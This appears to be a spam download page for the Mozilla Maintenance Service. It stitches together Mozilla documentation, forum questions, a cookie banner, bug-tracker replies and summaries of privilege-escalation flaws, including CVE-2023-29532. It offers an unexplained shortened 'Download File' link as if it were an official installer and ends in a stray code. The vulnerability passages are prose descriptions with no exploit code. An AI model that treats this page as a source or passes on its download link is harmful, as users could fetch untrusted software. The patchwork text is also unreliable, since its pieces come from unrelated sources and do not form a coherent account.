Mozilla Maintenance Service Download ((INSTALL))

[Masako Hildreth]

<div>Firefox and Thunderbird install an optional service called the Mozilla Maintenance Service which allows application updates to occur in the background, without requiring you to click Yes in the Windows User Account Control (UAC) dialog.</div><div></div><div></div><div>When Firefox or Thunderbird downloads an application update, the Mozilla Maintenance Service gets permission from Windows to allow the update to be applied, without requiring you to click Yes in the Windows User Account Control (UAC) dialog. Until that time, the service doesn't run, so it doesn't use any computer resources and, once the update process begins, the service quits. For more details, see this Mozilla Wiki page.</div><div></div><div></div><div></div><div></div><div></div><div>mozilla maintenance service download</div><div></div><div>Download File: https://t.co/xAdTLnHi42 </div><div></div><div></div><div>I am using a PC, Windows 10. I have the latest version of Firefox installed, ie V 62.0.2 (x64 en-US) from Sep 21, 2018. The Mozilla Maintenance Service (MMS) version installed on my PC is V 55.0.3 from Jun 28, 2018. My review and reading of various posts on this site indicates the MMS version should be the same number as the Firefox version. How do I update MMS to 62.0.2? Thank you.</div><div></div><div></div><div>The MMS service (maintenanceservice.exe) is installed in its own folder (%PROGRAMFILES%\Mozilla Maintenance Service).Once you have grated UAC access for this application when you first installed it, no further approval is necessary.</div><div></div><div></div><div>By accepting all cookies, you agree to our use of cookies to deliver and maintain our services and site, improve the quality of Reddit, personalize Reddit content and advertising, and measure the effectiveness of advertising.</div><div></div><div></div><div>I currently use the Beta Channel of Firefox (maybe that's the issue). It has never updated "in the background" on either of my machines. Updates and notifications come when Firefox is started and require the usual re-start to install. Is there something I need to do, besides check the background update setting for this to work? I did just notice that even though my browser is at 110b3 that the Maintenance Service in Windows Apps apparently stopped changing at version 94. Recommendations or just disable background updates and uninstall the Maintenance Service app and keep updating the way it always has. Thanks.</div><div></div><div></div><div>FF 90 brought a service to make updating itself easier. checking the Windows Services i see that "Mozilla Maintenance Service" is set to manual by default, shouldn't it be automatic or something like that?</div><div></div><div>also the recovery options for that service are set to "take no action", to my understanding this means that if it fails, it won't try to restart itself or try again.</div><div></div><div>i changed the update settings on the FF preferences but it still remains to Manual.</div><div></div><div></div><div>Security researcher Seb Patane reported stack bufferoverflows in both the Maintenance Service and the Mozilla Updater whenunexpectedly long paths were encountered. A local attacker could pass these ascommand-line arguments to the Maintenance Service to crash either program andpotentially lead to arbitrary code being run with the Administrator privilegesused by the Maintenance Service and inherited by the Updater.</div><div></div><div></div><div>Now that this feature is implemented, Firefox uses a service to execute updates so that UAC prompts are not displayed. The service is run "on demand" and will remain stopped until it is needed. When the service is needed, it will be started again for the period of the update. If there are any problems updating through the service, it will fall back to updating the old way via the UAC prompt.</div><div></div><div></div><div></div><div></div><div></div><div></div><div>Since the service is only started when needed, we pass the information to the service via command line on service start. The service security is modified with a special ACE which allows non elevated processes to start and stop it. Setting these permissions on the service is needed because by default services can only be started and stopped by elevated processes. This is possible via the Win32 API SetServiceObjectSecurity.</div><div></div><div></div><div>The service logs all operations of the last update, as well as taking a backup of the last 10 update operation logsbefore it. The install process and update processes are logged separately. The logs live in %programdata%\Mozilla\logs.</div><div></div><div></div><div>Since the service executes an update via updater.exe in session 0, no UI is displayed. An alternate implementation could have been to have the UI display by running updater.exe with a user token from the service instead, but to avoid permission problems on files, and inconsistencies in different OS versions and user types, the update is always run as session 0 with the SYSTEM account.</div><div></div><div></div><div>If a service is already installed, the service will be replaced on updates and installs only if it is newer than what is installed. This means that if a user has Nightly installed, the Nightly service will be used to update all channels.</div><div></div><div></div><div>As of Firefox 35, the service is also installed and used with x64 native builds.If both x86 and x64 builds are used, then the service will be installed and updated into the first location it was installed to.The x86 service can update both x86 and x64 builds. The x64 service can also update both x86 and x64 builds.Work was done for native x64 builds in Bug 715876.</div><div></div><div></div><div>The service decides whether or not it is newer by looking at the updater file's version number in comparison to a new one being updated by application update or the installer. Only if the newer version number is greater will it be replaced. This means that if the user runs builds like Nightly, then the Nightly service would update all other channels. It will therefore always be backwards compatible.</div><div></div><div></div><div>Whether a user is an administrator or a limited user account, they can initiate an update. The ability for limited user accounts to do a manual software update through the service was landed in Bug 711475.</div><div></div><div></div><div>The Exploit Database is maintained by OffSec, an information security training company that provides various Information Security Certifications as well as high end penetration testing services. The Exploit Database is a non-profit project that is provided as a public service by OffSec.</div><div></div><div></div><div>I was not able to reproduce this bug on my machine win 10x64.</div><div></div><div>Did you started "Mozilla maintenance service" by double clicking the maintenanceservice.exe or ran as admin? I tried both ways and have no error.</div><div></div><div>I will move this over to a component so developers can take a look over it. If this is not the correct component please feel free to change it to an appropriate one.</div><div></div><div></div><div>As mentioned above, this part is expected behavior. The Mozilla Maintenance Service is not meant to be invoked manually, and it is not expected to function properly if you attempt to do so. See its support article for information on what it does do.</div><div></div><div></div><div>This bug is titled Mozilla maintenance service can't start due to "Error 1: incorrect function". In the future, please file a new bug rather than posting to a bug that describes a different issue than the one you are having.</div><div></div><div></div><div>This isn't supported and is the cause of the problem that you are having. The only supported way of installing the Mozilla Maintenance Service is using the Firefox installer. The maintenanceservice_installer.exe binary is not meant to be used in the fashion that you are using it in.</div><div></div><div></div><div>I'll try to give a short explanation about why this is. The Maintenance Service's purpose is essentially to re-invoke the updater with elevated permissions. It's quite dangerous to install a privileged application that basically gives out privileges to other binaries. In order to secure this process, the Firefox installer writes some certificate information into the Windows Registry that we can use to verify the certificates used to sign the Firefox updater. It then refuses to grant privileges to programs if it cannot verify that they are properly signed. But, the certificate information is only written by the Firefox installer and only if the Maintenance Service is being used.</div><div></div><div></div><div>Since you told the Firefox installer not to use the Maintenance Service, it didn't write the certificate information that is necessary for the updater to successfully use the Maintenance Service. In your version of Firefox, this error is not recoverable and so update fails completely. This was addressed in Bug 1710690, allowing Firefox to fall back to showing a UAC prompt if the Maintenance Service fails. But since that fix landed in version 99, it won't be available on the ESR channel until version 102.</div><div></div><div></div><div>If you are experiencing this when trying to manually start the Maintenance Service, please refer to Comment 3 and Comment 4, because this is the expected behavior if you try to do that. The Maintenance Service simply does not work that way.</div><div></div><div></div><div>A vulnerability in the Mozilla Maintenance Service (CVE-2023-29532) allows a local attacker to trick the Mozilla Maintenance Service into applying an unsigned update file by pointing the service to an update file on a malicious SMB server. This allows privilege escalation to the LocalSystem account. The vulnerability has been fixed in Firefox 112, Firefox ESR 102.10, and Thunderbird 102.10.</div><div></div><div></div><div>Firefox and Thunderbird offer an optional feature, enabled by default, known as the Mozilla Maintenance Service, which allows application updates to be performed in the background without user interaction.</div><div></div><div></div><div>During the Mozilla Maintenance Service update process, update data is retrieved via a user-defined path pointing to a mar archive. It is important that only mar files from trusted sources are used, so a signature check is performed. This check only works as intended if the contents of the mar file remain unchanged, because the file is accessed twice - once for the signature check and once for the actual update.</div><div></div><div></div><div>The issue can be exploited on Microsoft Windows to escalate privileges to the LocalSystem account, under which the service is running. To do this, it is necessary to downgrade to an old and manipulated version of Firefox via the vulnerability. This manipulated version can then be used in conjunction with the Mozilla Maintenance Service to load a malicious library during an update.</div><div></div><div> 8d45195817</div>